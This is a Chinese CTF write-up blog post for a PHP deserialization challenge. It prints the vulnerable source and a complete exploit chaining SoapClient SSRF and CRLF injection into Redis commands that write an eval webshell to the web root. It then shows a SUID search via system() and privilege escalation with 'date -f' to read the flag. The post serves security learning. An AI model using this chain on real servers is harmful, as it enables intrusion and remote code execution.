EasyLove

最新推荐文章于 2024-10-01 18:22:37 发布
最新推荐文章于 2024-10-01 18:22:37 发布
阅读量1.2k 收藏
点赞数 2
文章标签: php 数据库 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64201116/article/details/127541280
版权

如果对redis写shell、SoapClient SSRF不了解的话,先恶补一些知识吧。

浅谈Linux下的redis攻击_清风--的博客-CSDN博客

SoapClient反序列化SSRF组合拳 - 腾讯云开发者社区-腾讯云 (tencent.com)

使用Soap的ssrf/crlf攻击 - 简书 (jianshu.com)

文章里面的还有不懂的就继续百度,学到会为止,学习本来就是一个痛苦的过程,同时也是一个享受的过程,要学会乐在其中,不要心急火燎,心态放正,才能学好东西。

源码:

  <?php
highlight_file(__FILE__);
error_reporting(0);
class swpu{
    public $wllm;
    public $arsenetang;
    public $l61q4cheng;
    public $love;
    
    public function __construct($wllm,$arsenetang,$l61q4cheng,$love){
        $this->wllm = $wllm;
        $this->arsenetang = $arsenetang;
        $this->l61q4cheng = $l61q4cheng;
        $this->love = $love;
    }
    public function newnewnew(){
        $this->love = new $this->wllm($this->arsenetang,$this->l61q4cheng);
    }

    public function flag(){
        $this->love->getflag();
    }
    
    public function __destruct(){
        $this->newnewnew();
        $this->flag();
    }
}
class hint{
    public $hint;
    public function __destruct(){
        echo file_get_contents($this-> hint.'hint.php');
    }
}
$hello = $_GET['hello'];
$world = unserialize($hello);

先读hint():

<?php
class hint{
    public $hint;
    public function __destruct(){
        echo file_get_contents($this-> hint.'hint.php');
    }
}
$a = new hint();
$payload = array($a,NULL);
echo serialize($payload);
// 这里wp好像是用伪协议读取,但是做题第一时间没想到,用了上面这个方法

hint:

<?php $hint = "My favorite database is Redis and My favorite day is 20220311"; ?>

原来是要告诉我们攻击redis,并且密码是20220311,当时做题完全不懂什么意思

攻击redis,能想到的只有SSRF了,刚好里面有一个:

new $this->wllm($this->arsenetang,$this->l61q4cheng)

和构造SoapClient格式一致(密码正确)

这里学到新知识:

确实是长知识了,如何这里请求头的话好像没有,是直接一条命令一行:

使用exp:

没改,这个exp构造不难,主要是上面那个新知识是关键。

<?php
$target='http://127.0.0.1:6379/';
$poc0="AUTH 20220311";
$poc="CONFIG SET dir /var/www/html";
$poc1="SET x '<?@eval(\$_POST[1]);?>'";
$poc2="CONFIG SET dbfilename cmd.php";
$poc3="SAVE";
$a = array('location' => $target,'uri' =>
'hello^^'.$poc0.'^^'.$poc.'^^'.$poc1.'^^'.$poc2.'^^'.$poc3.'^^hello');
$aaa = serialize($a);
$aaa = str_replace('^^',"\r\n",$aaa);
$c=unserialize($aaa);
class swpu{
 public $wllm = 'SoapClient';
 public $arsenetang = null;
 public $l61q4cheng;
 public $love;
}
$a=new swpu();
$a->l61q4cheng=$c;
echo urlencode(serialize($a));

构造出来发送的信息是这样的:(复现的时候还傻傻的伪造POST数据,完全没搞懂原理才会这么做。。)

构造出来后写马成功连接就可以了,发现没有权限读flag。

suid提权,蚁剑的shell看不到suid的数据。可以反弹shell,或者直接在页面1=system(" find / -perm -u=s -type f 2>/dev/null ");

不过这次好像页面也读不到suid的内容,就弹个shell了:

这次也是date命令提权,上次是xiaoqiuxx师傅教我的

date -f /here*/f*直接读取了:

清风--
关注
love easy demo HTML浪漫表白代码
08-21
在本示例中,"love easy demo HTML浪漫表白代码" 是一个利用HTML技术制作的创意应用,旨在为特殊场合如520(我爱你)、情人节、生日或求婚提供一种浪漫的表达方式。通过这个项目,你可以了解到如何用HTML来构建互动...
EasyConnect
08-16
EasyConnect SSL 客户端PC端下载,下载下来需要解压缩
ctfshow——反序列化
qq_55202378的博客
02-26 647
不要相等即可,注意GET传参时也要做修改。这里就是使用GET传输,username赋值为。变量进行反序列化,因此只需要GET传输的变量。以上一题相比,其实就是反序列化的类中的变量。,注意需要对user的值进行URL编码。,password也1赋值为。相等,且反序列化后的。
利用SoapClient类进行SSRF+CRLF攻击
Lethe's Blog
09-06 3630
前一段时间在De1CTF中的ShellShellShell以及SUCTF的Upload labs2都涉及到了利用PHPSoapClient类进行SSRF,因此在这里记录下。 0x01 什么是Soap SOAPwebService三要素(SOAP、WSDL、UDDI)之一: WSDL 用来描述如何访问具体的接口。 UDDI用来管理,分发,查询webService。 SOAP(简单对...
soapClient上遇到的坑
qiguiting的专栏
12-14 3265
公司项目里用到了soap,准备在测试机器搭建测试环境,结果一直卡在soapClient这里,总是连不上服务端,尼玛各种找资料啊 ,打异常 都没用,最后竟然是服务端的域名没做指定,需要手动配host,我日了 坑死了
Downloading love
何新生(Daniel) 勇敢坚毅真正之才智乃刚毅之志向。 —— 拿破仑
12-08 1109
Downloading  love        What a fantastic social these years, Theuse of computers and the internet is spreading rapidly. It is real easy for usto download many things ranging from MP3 or cellphone to
CTF-easy_php
m0_62593857的博客
02-01 606
ctf-easy_php
Spring整合Easy-ES
LoveTalk的博客
09-30 1120
详细步骤及讲解Spring中如何使用Easy-ES实现各种功能
The One You Love
cjh6456022的博客
03-16 138
读高中就会哼唱着这首歌,但是现在才明白歌词的意思.....i know you need a friend someone you can talk to who will understand that you're goin...
we love ajax we do,we love to be fashionable.so we后面的文章是什么
weixin_39843215的博客
08-06 204
We love to be fashionable.So we buy clothes from time to time to make us look (prettier) or cooler.But a problem appears:how to deal with those old clothes?Don't just throw them out.You can do (someth...
UVA10679 I Love Strings!!【字符串匹配】
海岛Blog
05-30 269
Hmmmmmm… strings again ???? Then it must be an easy task for you. Well . . . you are given with a string S of length not more than 100,000 (only ‘a’-‘z’ and ‘A’-‘Z’). Then follows q (q < 1000) queries where each query contains a string T of maximum leng
PHP安装后Apache无法运行的问题
最新发布
Bingyeshinvwang的博客
10-01 355
php安装之后,修改httpd.conf无法运行Apache的解决方案
PHP反序列化2(OC绕过.wakeup绕过)
2302_81328699的博客
09-26 522
PHP反序列化2(OC绕过.wakeup绕过)
服务器被挂马,导致网站首页被更改怎么解决
KookeeyLena7的博客
09-27 1282
当服务器被挂马并导致网站首页被篡改时,说明服务器或网站的安全性遭到破坏。
Thinkphp/Laravel基于vue的少数民族民歌网络图书馆管理系统
abo2022的博客
09-30 1011
ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,尤其注重开发体验和易用性,并且拥有众多的原创功能和特性,为WEB应用开发提供了强有力的支持Laravel非常的简洁并且是开源的,Laravel 是一个具有表现力、优雅语法的 Web 应用程序框架. Laravel 是构建现代全栈 Web 应用程序的最佳选择.
php基础语法
liyy614的博客
09-27 1062
PHP(Hypertext Preprocessor)是一种广泛使用的开源服务器端脚本语言,特别适合用于Web开发。
tauri中加载本地文件图片或者下载网络文件图片后存储到本地,然后通过前端页面展示
09-26 612
有一个需求是需要将本地上传的文件或者网络下载的文件存储到本地,并展示在前端页面上的。要想实现上述需求,需要三个步骤,配置相应的文件和文件夹访问权限,然后将文件存储到软件的相应目录中,再从目录中加载这个资源并展示。
编写python程序,统计一段英文段落中所有字符出现的次数,要求输出9个统计项后换行,测试输入:I have a lovely dog named Bobby.He looks pretty with short legs,big ears and short tail.He is my good friend and he is also easy to take care of.I walk him at least twice a day,feed him and spend time with him.He also gives his love to me in return. 预期输出: 每个字符出现的次数如下: ('I', 2),(' ', 49),('h', 10),('a', 18),('v', 4),('e', 24),('l', 10),('o', 15),('y', 6), ('d', 10),('g', 5),('n', 8),('m', 7),('B', 1),('b', 3),('.', 5),('H', 3),('k', 3), ('s', 14),('p', 2),('r', 8),('t', 15),('w', 4),('i', 15),(',', 2),('f', 3),('c', 2), ('u', 1),
04-20
big ears and short tail.He is my good friend and he is also easy to take care of.I walk him at least twice a day,feed him and spend time with him.He also gives his love to me in return." chars = {} ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值